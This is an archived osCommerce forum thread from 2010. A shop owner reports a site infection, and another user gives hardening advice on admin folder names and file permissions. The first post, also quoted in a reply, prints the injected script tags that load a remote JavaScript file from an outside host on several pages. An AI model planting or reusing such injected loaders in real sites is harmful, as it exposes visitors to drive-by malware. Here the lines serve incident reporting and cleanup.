pablito21050 Posted June 17, 2010 Posted June 17, 2010 Hello, I found a virus on my OSCommerce that is still "under construction". These are just some of the infected files: includes/general.js line 192 document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>'); includes/languages/english/index.php line 42 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> admin/index.php line 12 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> my_admin_name/index.php line 124 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> I have already installed: 1.) .htaccess 2.) Sam's_anti-hacker_account_mods_V1.6 3.) PHPIDS_for_osCommerce_1_6 2 4.) Security Pro not yet: 5.) SiteMonitor_V_2.2 6.) Pronux MySQL DB Comparer I didn't get any warning message, I discover it cause a lightbox installed on the homepage didn't work.. We are cleaning the files but how to prevent these kinds of problem in the future? I need suggestions, thanks.
♥joli1811 Posted June 18, 2010 Posted June 18, 2010 Hello, I found a virus on my OSCommerce that is still "under construction". These are just some of the infected files: includes/general.js line 192 document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>'); includes/languages/english/index.php line 42 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> admin/index.php line 12 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> my_admin_name/index.php line 124 <script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script> <!--da6cf579973cbe80fd6e366d151e8ea0--> I have already installed: 1.) .htaccess 2.) Sam's_anti-hacker_account_mods_V1.6 3.) PHPIDS_for_osCommerce_1_6 2 4.) Security Pro not yet: 5.) SiteMonitor_V_2.2 6.) Pronux MySQL DB Comparer I didn't get any warning message, I discover it cause a lightbox installed on the homepage didn't work.. We are cleaning the files but how to prevent these kinds of problem in the future? I need suggestions, thanks. Hi, Remember to change also the name of the admin( find personally the most important) you also then need to change two lines in the includes/configure.php and admin/includes/configure.php Go to the thread http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ and check that you have taken all the advice if it still persists change hosting. John To improve is to change; to be perfect is to change often.
pablito21050 Posted July 2, 2010 Author Posted July 2, 2010 Hi, Remember to change also the name of the admin( find personally the most important) you also then need to change two lines in the includes/configure.php and admin/includes/configure.php Go to the thread http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ and check that you have taken all the advice if it still persists change hosting. John Hi and thanks for your answer, I did it already a lot, security related, of course I changed the ADMIN name folder and I installed: Security Pro IP Trap SAM Antihacker mod PHPIDS and .htaccess files After the virus, we cleaned all files and re-installed the add ons, I'm installing these days Site monitor and DB compare, I checked all the permissions manually, cause I didn't undestand how it works check permission contribution. I hope that will be enough.
♥joli1811 Posted July 3, 2010 Posted July 3, 2010 Hi and thanks for your answer, I did it already a lot, security related, of course I changed the ADMIN name folder and I installed: Security Pro IP Trap SAM Antihacker mod PHPIDS and .htaccess files After the virus, we cleaned all files and re-installed the add ons, I'm installing these days Site monitor and DB compare, I checked all the permissions manually, cause I didn't undestand how it works check permission contribution. I hope that will be enough. Hi, The permissions should be checked in your cpanel(or equivalent)this is your web host control panel files 644 and the yellow folders 775 This is not FTP as sometimes there may be problems changing the actual permissions. John To improve is to change; to be perfect is to change often.
♥joli1811 Posted July 3, 2010 Posted July 3, 2010 Hi and thanks for your answer, I did it already a lot, security related, of course I changed the ADMIN name folder and I installed: Security Pro IP Trap SAM Antihacker mod PHPIDS and .htaccess files After the virus, we cleaned all files and re-installed the add ons, I'm installing these days Site monitor and DB compare, I checked all the permissions manually, cause I didn't undestand how it works check permission contribution. I hope that will be enough. Hi, The permissions should be checked in your cpanel(or equivalent)this is your web host control panel the files should be 644 and the yellow folders 775. This is not FTP as sometimes there may be problems changing the actual permissions by FTP. In your web hosting control panel you should be able to view all the files and folders of your domain/sites under file manager (this is not the file manager from your admin in OSC)... but from your web hosting control panel!! Here you should be able to see/check and change all file premissions correctly. John To improve is to change; to be perfect is to change often.
pablito21050 Posted July 3, 2010 Author Posted July 3, 2010 Hi, The permissions should be checked in your cpanel(or equivalent)this is your web host control panel the files should be 644 and the yellow folders 775. This is not FTP as sometimes there may be problems changing the actual permissions by FTP. In your web hosting control panel you should be able to view all the files and folders of your domain/sites under file manager (this is not the file manager from your admin in OSC)... but from your web hosting control panel!! Here you should be able to see/check and change all file premissions correctly. John This is new for me, I always did by client FTP. Thanks.
♥joli1811 Posted July 3, 2010 Posted July 3, 2010 This is new for me, I always did by client FTP. Thanks. Hi, sometimes depending on the you host, it is not possible to change the file premissions by FTP that is why it is better to go directly to the web host control panel you should have recieved the information on how to access the control panel when you made your hosting contract. Here you also have the access to sql database and other useful tools check the welcome mail you received with the hosting all the details that you need should be there. John To improve is to change; to be perfect is to change often.
pablito21050 Posted July 3, 2010 Author Posted July 3, 2010 Hi, sometimes depending on the you host, it is not possible to change the file premissions by FTP that is why it is better to go directly to the web host control panel you should have recieved the information on how to access the control panel when you made your hosting contract. Here you also have the access to sql database and other useful tools check the welcome mail you received with the hosting all the details that you need should be there. John Yes, I received the login information three years ago when I started to work on the web, I do not understand the connection to the security problem that i had with osC.. I assure you that with a client i use, is possible to change the permissions.
♥joli1811 Posted July 3, 2010 Posted July 3, 2010 Yes, I received the login information three years ago when I started to work on the web, I do not understand the connection to the security problem that i had with osC.. I assure you that with a client i use, is possible to change the permissions. Hi, do you have a cpanel/webhosting access?? To improve is to change; to be perfect is to change often.
♥joli1811 Posted July 3, 2010 Posted July 3, 2010 The reason is as regards security, often the FTP or OSC filemanager will not change the file premission correctly and you most go directly to the web host control panel depends on the host!! John To improve is to change; to be perfect is to change often.
♥joli1811 Posted July 3, 2010 Posted July 3, 2010 The reason is as regards security, often the FTP or OSC filemanager will not change the file premission correctly and you most go directly to the web host control panel depends on the host!! John Hi, Forgot the osc/admin/admin/file_manager.php I think you have already removed sorry for the confusion. John To improve is to change; to be perfect is to change often.
tonelul Posted July 7, 2010 Posted July 7, 2010 Some programs sucks. It shows a virus and actually there isn't there. I used so many antiviruses and it was bad. Then i chose an old version of kaspersky this is ok, finally:)
Recommended Posts
Archived
This topic is now archived and is closed to further replies.